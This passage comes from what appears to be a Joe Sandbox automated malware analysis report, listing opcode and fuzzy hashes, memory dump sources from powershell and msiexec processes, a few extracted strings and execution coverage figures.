                                                                                            • Instruction ID: ed21be23b69dd69f5b5cd1ca067439bc1dcd5eda31babf7085dcd3d71abf26b7
                                                                                            • Opcode Fuzzy Hash: 7d66bd0e7f1e709695f1f3eb093e04560cc5953494105dd00d034376e62968d3
                                                                                            • Instruction Fuzzy Hash: 94514D34A05644DFCB15CF5CC8849ADBBF2BF89310B248269D955E7366D335EC91CBA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7fb63594d0409c015b5ba0181aab6a5465c84e7df1193313733aa0ba04389934
                                                                                            • Instruction ID: 18045ccc547fe3484efbebb4f429081584f1f1776f948112ace0656d54fe63e2
                                                                                            • Opcode Fuzzy Hash: 7fb63594d0409c015b5ba0181aab6a5465c84e7df1193313733aa0ba04389934
                                                                                            • Instruction Fuzzy Hash: 50512B35A002098FDB05DF68E484BDE7BB2BF88314F149154D812AB3A6DB74ED85CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f7c90db829301b1462562eeca88b66e230d883fa914ede730eff77baf9f79125
                                                                                            • Instruction ID: 5a9f45f2b53474ca3e42a1ab6a57b3dddccb9429e427d51eb4714b32c6c88973
                                                                                            • Opcode Fuzzy Hash: f7c90db829301b1462562eeca88b66e230d883fa914ede730eff77baf9f79125
                                                                                            • Instruction Fuzzy Hash: 9A414230B002049FEB15DB75C4947AEB7F3EF88710F19C469D806AB755DB75AC418BA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c7e74a678db713cedff565a65e222d339b842932ba4c2c14dab160d2f38e9d35
                                                                                            • Instruction ID: 8bb8fd3055c343199d29a30b1656a97cad93532cecd75cadb0bee3eec23a764d
                                                                                            • Opcode Fuzzy Hash: c7e74a678db713cedff565a65e222d339b842932ba4c2c14dab160d2f38e9d35
                                                                                            • Instruction Fuzzy Hash: 69413B74A04205DFDB15CF99C894AAEBBB1FF48320F248268E955A73A5C735EC41CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ccd194653972a091365406ac2aef19b217567382218ef27cb6a26ff947b70dd
                                                                                            • Instruction ID: f2dc311834b5749cadffb80680341fe24dc5a557492366feeed5e95d6647cbfd
                                                                                            • Opcode Fuzzy Hash: 8ccd194653972a091365406ac2aef19b217567382218ef27cb6a26ff947b70dd
                                                                                            • Instruction Fuzzy Hash: 1A411874A00209DFDB15CF99C984AAEB7B1FF48320F648268E955A73A5C735EC41CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886537386.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f90cba4d124edcf4a4fa66ea791337c0b201645f4ef477c29ca1a598d99285a
                                                                                            • Instruction ID: af197abca4dda674535623605386b7f25e58cefcd32adb2e53d76b88965e0a54
                                                                                            • Opcode Fuzzy Hash: 9f90cba4d124edcf4a4fa66ea791337c0b201645f4ef477c29ca1a598d99285a
                                                                                            • Instruction Fuzzy Hash: D741E974E006099FCB15CF59C884AAEBBF1FF48314F258269E916A7366C735AC51CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 84486ec4de282aef4351caf15504f409570ad9d887de12a91cd6086f073dcbf4
                                                                                            • Instruction ID: 6cf5802535cd1f0c7618485f3c69be3836ae7d35b9d1c4bb226564b2ec0f4371
                                                                                            • Opcode Fuzzy Hash: 84486ec4de282aef4351caf15504f409570ad9d887de12a91cd6086f073dcbf4
                                                                                            • Instruction Fuzzy Hash: 79414875A002098FCB15CF58D594EAAFBB1FF48314B118699D916AB3A4C732FC90CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0fa3790337472d838630cf70bbcc6e9cbb378565d6e9af70cf3327ce9f71aa21
                                                                                            • Instruction ID: 2e75db3d634d0cfef4215e4cc9979710dba474a0efa4ad238c9c02415e166145
                                                                                            • Opcode Fuzzy Hash: 0fa3790337472d838630cf70bbcc6e9cbb378565d6e9af70cf3327ce9f71aa21
                                                                                            • Instruction Fuzzy Hash: 6C415C35B002058FDB14DB64D958AAD7BB6FF88754F049828E406AB7A0DB34AD41CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8747acbe994e30708eea4976e5730d9080e271eaa677508ebf94ac253a79ff62
                                                                                            • Instruction ID: b974d223c76ef5418f4e4078f33c50e4f7eb465ca5efc71094d795333fbaa97a
                                                                                            • Opcode Fuzzy Hash: 8747acbe994e30708eea4976e5730d9080e271eaa677508ebf94ac253a79ff62
                                                                                            • Instruction Fuzzy Hash: 0531A435B002149FF704D7A4C854BAE7AA3AB85310F258468E9066F3D2CFB6DD428B95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0320e6a1db8100bba5ede6af01db4c190d1406faee202ced202cbf063e965804
                                                                                            • Instruction ID: a4753f6b129ef5286eba83f73c711252514ef1497853843e9721d91780342dee
                                                                                            • Opcode Fuzzy Hash: 0320e6a1db8100bba5ede6af01db4c190d1406faee202ced202cbf063e965804
                                                                                            • Instruction Fuzzy Hash: 5831F731B003289BEB09DB65E850BEE7BA7AFC8700F148029D405BB795DF7498458B94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22b9e845827d21f6b65b4cc22511b507b3c63deaa38ce4fd0fadc147d478b1e1
                                                                                            • Instruction ID: 13f2f155f66c59aa321307739a01a496f8f62a733a6358a5945e43df7ae744c7
                                                                                            • Opcode Fuzzy Hash: 22b9e845827d21f6b65b4cc22511b507b3c63deaa38ce4fd0fadc147d478b1e1
                                                                                            • Instruction Fuzzy Hash: 8D217C3270031ADFF7B457B9881073A769A9BC4625F24843EE546DB3C2DE76D881C3A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886502430.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6b748fcfe5daf1fe86bdbd905061b4ae3f1b827cd08fceb6bd61dbe356cc49f8
                                                                                            • Instruction ID: 35fb2b44d1c2722942b80bb35027b19df841a4a76ec8d7f4ebc70a86df5a6aac
                                                                                            • Opcode Fuzzy Hash: 6b748fcfe5daf1fe86bdbd905061b4ae3f1b827cd08fceb6bd61dbe356cc49f8
                                                                                            • Instruction Fuzzy Hash: 52210571B00200DFEB345A75840277E7AD6AF88647F94403DE8169B28AEB36C981C7B1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 549f3bf7cfea021e3c94a03b5f6e75e71b64927f055b4025b9b4a5ef513ae9fc
                                                                                            • Instruction ID: f16d645ad1d2b9414d9aa809267a63097971ae6a4e73b362b611fdb50926f0c8
                                                                                            • Opcode Fuzzy Hash: 549f3bf7cfea021e3c94a03b5f6e75e71b64927f055b4025b9b4a5ef513ae9fc
                                                                                            • Instruction Fuzzy Hash: 6321CB32708389AFF7B0477608107367FA98F81220F18816EE546DB3C3DA7AD881C761
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858667534.000000000273D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_273d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 784721c1422d008253b508a66f227aee83d374f3e8ab988822056ccfaed3a733
                                                                                            • Instruction ID: 7b3b705b9f160dc86a02cea44840faa3df7f864b4d2ea0aa07725b6248b08d27
                                                                                            • Opcode Fuzzy Hash: 784721c1422d008253b508a66f227aee83d374f3e8ab988822056ccfaed3a733
                                                                                            • Instruction Fuzzy Hash: 2121F476904204EFDF06DF50D9C0B26BB65FB88314F24C5A9E9094A657C33AD856CBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1886502430.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_87e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e6576c08248aa327c2c8619bae8a1128038f5651002530f4a5a53c98d2caf59
                                                                                            • Instruction ID: aa490ee4064a4d0ea22839585b2659558d0de6646479a4457287441426d8f1e8
                                                                                            • Opcode Fuzzy Hash: 1e6576c08248aa327c2c8619bae8a1128038f5651002530f4a5a53c98d2caf59
                                                                                            • Instruction Fuzzy Hash: B3113632708246CFEB35D169A8402AAF3A1AB8D122F20817FE5D78734ADA3184168762
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d0f3e770a26e446893b8b210f884dba540f4837cecf6f2dbbce0b0f6210d225c
                                                                                            • Instruction ID: 637ec5d5b71b952a4094be3589c75180a86a921ea3bca8505989693409da521a
                                                                                            • Opcode Fuzzy Hash: d0f3e770a26e446893b8b210f884dba540f4837cecf6f2dbbce0b0f6210d225c
                                                                                            • Instruction Fuzzy Hash: C0214DB4A042499FCB00DF98D890A9EFBF5FF89310B158099D949AB352C731FC41CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5dfec203f24b8f5afdb6271b9dc6b10b79ffbeb69cbb3501f84c55a2c6365071
                                                                                            • Instruction ID: 7abb33343439795fdda661c13374d4daf7738603d8b59690800b769f1b495e5a
                                                                                            • Opcode Fuzzy Hash: 5dfec203f24b8f5afdb6271b9dc6b10b79ffbeb69cbb3501f84c55a2c6365071
                                                                                            • Instruction Fuzzy Hash: 3F115972B0A3C55FE33647541820226EFB26BC1930B1944FFD5419B796C976DC02C7B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858667534.000000000273D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_273d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ba8d1145cd1edadf593b1aeb8fc6869ae5a4eb33e336369ac5449e41c69a016
                                                                                            • Instruction ID: 1ec7124217c7faf66080c025de0521d6d80b9e46d46fce7948d5bd6933074db8
                                                                                            • Opcode Fuzzy Hash: 3ba8d1145cd1edadf593b1aeb8fc6869ae5a4eb33e336369ac5449e41c69a016
                                                                                            • Instruction Fuzzy Hash: 2C218C76904240DFCF06CF10D9C4B16BF72FB48314F24C5A9D9494A657C33AD46ACB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 63d87480c3aa9b62078bff1fc250bdda2b64166d5e2dfaab4604ebece430c368
                                                                                            • Instruction ID: 520d536f8b7db6d95f359d4ebb8c7d3850d0cc9bcc9fac800264253910661de2
                                                                                            • Opcode Fuzzy Hash: 63d87480c3aa9b62078bff1fc250bdda2b64166d5e2dfaab4604ebece430c368
                                                                                            • Instruction Fuzzy Hash: C0016D313403402BD325A779AC51B9E7B97FBC0721F14447AD1069F392CD646C0947D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858667534.000000000273D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_273d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 301ed3551652ce79e8e7284950aa008ec0395ffcb5bd1703d5bf5ee17633d8e8
                                                                                            • Instruction ID: 379b59bbbc626ef657ea55d52fd5d0c50ef15d826d07538990e4c000b163d641
                                                                                            • Opcode Fuzzy Hash: 301ed3551652ce79e8e7284950aa008ec0395ffcb5bd1703d5bf5ee17633d8e8
                                                                                            • Instruction Fuzzy Hash: 140126325053449EF7324E21CC84B67BB98DF41B24F08C41AEC186F243C3B99881CAB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858667534.000000000273D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_273d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a883ccf2aebf94e6d725265657dff7acfa6541d97bf236c3355f3abd587cfce2
                                                                                            • Instruction ID: 46955e7c7234095b1c42c2eba09e723db4d075ab3f046da3e830757e00653c3d
                                                                                            • Opcode Fuzzy Hash: a883ccf2aebf94e6d725265657dff7acfa6541d97bf236c3355f3abd587cfce2
                                                                                            • Instruction Fuzzy Hash: EA010C7240E3C05ED7238B258C94B62BFB4DF53624F1981DBD9989F2A3C3695849CB72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3218361b5df99a939dff5d7b9bc06f5302a635fd432760d0b5ae3f28e7995c95
                                                                                            • Instruction ID: 58ac6a419404a2bc4dd6ba0d1ea7ce1b982a7241e79635858579cb34f83579b8
                                                                                            • Opcode Fuzzy Hash: 3218361b5df99a939dff5d7b9bc06f5302a635fd432760d0b5ae3f28e7995c95
                                                                                            • Instruction Fuzzy Hash: B3F0C2BA7105108FCB4A6B38E16987E3BA7FFCC212325405AE906C3350CF78DC028B86
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 62a16c972f41248f99e16cb207892ff39475671e023d228c399db8f8b9442da4
                                                                                            • Instruction ID: 7507813aa1671d1029d3ac4138f0bb7de10fd0d2826b44ac280231ffee4982ae
                                                                                            • Opcode Fuzzy Hash: 62a16c972f41248f99e16cb207892ff39475671e023d228c399db8f8b9442da4
                                                                                            • Instruction Fuzzy Hash: B9F0F6303403042BE229A6299C55F2E7657ABC4B10F60487CD1075F396CEB4AC094BD4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9cd15b62f0a17d3b8d6088fdf3784eb8d24c782bac1bb9dc767cba5ce92149f4
                                                                                            • Instruction ID: ce8b772c35afa24e579f688b2156c9812de4e1f2de179ffc014aa86ac5b954b2
                                                                                            • Opcode Fuzzy Hash: 9cd15b62f0a17d3b8d6088fdf3784eb8d24c782bac1bb9dc767cba5ce92149f4
                                                                                            • Instruction Fuzzy Hash: 92F0F6363002084BDB251769B48826EB3ABFBC9211B40453CD44F8B356DFB59C098786
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7dbf639bfa20924592ad1380b2a4988233b15d4447760969e5098c5e6e63cca3
                                                                                            • Instruction ID: 81aa75aee4d31ac32ea9b95fa6bdb175fce772f27a12185a22888ca6d232d82b
                                                                                            • Opcode Fuzzy Hash: 7dbf639bfa20924592ad1380b2a4988233b15d4447760969e5098c5e6e63cca3
                                                                                            • Instruction Fuzzy Hash: C8F08BF31193449FD302C775D8206A0BFA8EA4220070450CAD988CB352EA3AEA03DB21
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6ec3b9fd8a5cb9615a241f4c938eece546e59e6e66390ac28fe05e70b7aedf5
                                                                                            • Instruction ID: d5a2eb319007a65c614f155f57e7e16f177d7fde9626fe52ca0ef6dfdd521476
                                                                                            • Opcode Fuzzy Hash: d6ec3b9fd8a5cb9615a241f4c938eece546e59e6e66390ac28fe05e70b7aedf5
                                                                                            • Instruction Fuzzy Hash: D5F0547A7105148BC7466B38E15D83E77A7EFCD6613244459E907C7350CF78DC028B96
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f4fe7171c36692270cb6d1070af9661cfa9e2d073ad64cbe4b953b80bb7cb695
                                                                                            • Instruction ID: 0586de6f3862abadc1dc353b0f623c09caa65789f2bcc938d99657c6c648ee1d
                                                                                            • Opcode Fuzzy Hash: f4fe7171c36692270cb6d1070af9661cfa9e2d073ad64cbe4b953b80bb7cb695
                                                                                            • Instruction Fuzzy Hash: 35F05C363042081BC712126DF45456EBBAFBFCA210300416AD19FCB357DF694C0583D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e0218bd1babcc03e0fd2b7710ef933b6a1239f357f0e4c3447d52c1a2387c5fe
                                                                                            • Instruction ID: f08c5e2e6cc32b75481a28e0ca003e2f805cb1780ab1addef7b646e089643af8
                                                                                            • Opcode Fuzzy Hash: e0218bd1babcc03e0fd2b7710ef933b6a1239f357f0e4c3447d52c1a2387c5fe
                                                                                            • Instruction Fuzzy Hash: C6F05C711083449FC303D735D8206D57BF9EF4620071441DAD984CB302EA36DD0BCB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ee1eb21a1dae84f1bd7f311cd215464bbc783c0d5d11dcc81c765760adedb161
                                                                                            • Instruction ID: b9e1f86837fd07108b07ceabf9585c22bf0611a9284a914bd1a6e61225e4a6c6
                                                                                            • Opcode Fuzzy Hash: ee1eb21a1dae84f1bd7f311cd215464bbc783c0d5d11dcc81c765760adedb161
                                                                                            • Instruction Fuzzy Hash: CEF08C353086966BC70A3B34A4282AEBFAAEF85365F04009AE41587282DF7D89118BD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a543a4f12a1941634955b9a201648b13ebf481aaedc93de8f646266aea61974c
                                                                                            • Instruction ID: 68735dc81f9b54c040bc0b10ecf3f3ee2774ae2d9b08dafdb0c0294ec8aa23b7
                                                                                            • Opcode Fuzzy Hash: a543a4f12a1941634955b9a201648b13ebf481aaedc93de8f646266aea61974c
                                                                                            • Instruction Fuzzy Hash: CCE09B75D00509AF4750DF7D9C416DDFFF5DB48200B20C46AD40ADB351E73195124BD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 872c2de515c328436948cefe1b9977264794668518e9c137c0b3ed74bca15d45
                                                                                            • Instruction ID: e889102b4d492891ece0832605625980fbedb10bc8dd68fe4e55a468ff94890b
                                                                                            • Opcode Fuzzy Hash: 872c2de515c328436948cefe1b9977264794668518e9c137c0b3ed74bca15d45
                                                                                            • Instruction Fuzzy Hash: DEE0863570461967CB0E3B79A01C6AE7AABEFC8765F000029E51687341DF7D9911C7D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1858928327.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_43d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3c9696dac770e9ab61c25e1a748d007758017b1f656a015df37927a82cc55e68
                                                                                            • Instruction ID: 5ea38a82db62b4fe625440545a85f3022d374751cd8c11f5eff5acc8f9f85075
                                                                                            • Opcode Fuzzy Hash: 3c9696dac770e9ab61c25e1a748d007758017b1f656a015df37927a82cc55e68
                                                                                            • Instruction Fuzzy Hash: AFE08675214309DBC752DB7AD900A65B7A9BB8824472451A9ED08C7301EF32ED03CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1881561194.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_6dc0000_powershell.jbxd
                                                                                            Strings
                                                                                            Similarity
                                                                                            • String ID: d%q$d%q$d%q$d%q
                                                                                            • API String ID: 0-555237205
                                                                                            Strings
                                                                                            Similarity
                                                                                            • String ID: (fm$(fm$(fm$(fm
                                                                                            • API String ID: 0-2418600045

                                                                                            Execution Graph

                                                                                            Execution Coverage:11.3%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:4
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph
                                                                                            • Node 18531: 31e018
                                                                                            • Node 18532: 31e024
                                                                                            • Node 18533: 31e06f LdrInitializeThunk
                                                                                            • Node 18534: 31e07d
                                                                                            • Edges: 18531->18532, 18532->18533, 18533->18534
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2629059197.0000000025DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 25DF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_25df0000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • String ID: K
                                                                                            • API String ID: 0-856455061
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2629059197.0000000025DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 25DF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_25df0000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0784cf5475392543715e1a0152b371ee45e54cba852b550abbe42d79c022e3d
                                                                                            • Instruction ID: cb9dfa610ce9890678abd5d73e2628d3e34bba7b64b82f10edb7616505e7bdba
                                                                                            • Opcode Fuzzy Hash: c0784cf5475392543715e1a0152b371ee45e54cba852b550abbe42d79c022e3d
                                                                                            • Instruction Fuzzy Hash: AC819575E016188FEB68CF6AC944B9DFBF2BF89300F14C1A9D508A7254DB745A85CF11
                                                                                            Memory Dump Source
